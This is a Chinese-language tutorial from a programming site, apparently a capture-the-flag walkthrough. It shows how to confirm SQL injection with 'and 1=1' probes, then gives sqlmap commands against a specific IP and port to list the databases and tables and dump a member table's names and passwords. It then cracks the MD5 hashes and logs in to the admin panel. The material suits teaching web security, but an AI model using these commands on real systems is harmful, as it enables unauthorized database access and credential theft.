欢迎来到代码驿站!

Mysql

当前位置:首页 > 数据库 > Mysql

sqlmap注入图文详解

时间:2022-03-14 10:04:18|栏目:Mysql|点击:

1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。

地址栏输入 and 1=1 发现页面正常显示。

在这里插入图片描述

再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞

在这里插入图片描述

2.现在拿出我们的kali工具,sqlmap进行注入测试。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs

在这里插入图片描述

3.可以看到存在注入漏洞,扫到了5个数据库。要获取管理员用户密码,我们可以先从stormgroup注入。查看stormgroup这个数据库存在的表单

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables

在这里插入图片描述

4.接下来查一下member中存在哪些列。

sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns

在这里插入图片描述

5.上一步可以看到,name,password 是不是很熟悉。ok接下来我们开始获取这两列的数据。

在这里插入图片描述

在这里插入图片描述

6.可以看到password是经过md5加密,接下来我们把他解密。这里推荐给大家我自己收集的多种解密网址:解密网址大全点击这里

在这里插入图片描述

7.now! 密码已经呈现在我们眼前!!!!找到后台地址进行登录。

在这里插入图片描述

8.END 登录成功,拿到flag,提交。Gameover !

总结

上一篇:发现mysql一个用法,比较有用

栏    目:Mysql

下一篇:linux Xtrabackup安装及使用方法

本文标题:sqlmap注入图文详解

本文地址:http://www.codeinn.net/misctech/196107.html

推荐教程

广告投放 | 联系我们 | 版权申明

重要申明:本站所有的文章、图片、评论等,均由网友发表或上传并维护或收集自网络,属个人行为,与本站立场无关。

如果侵犯了您的权利,请与我们联系,我们将在24小时内进行处理、任何非本站因素导致的法律后果,本站均不负任何责任。

联系QQ:914707363 | 邮箱:codeinn#126.com(#换成@)

Copyright © 2020 代码驿站 版权所有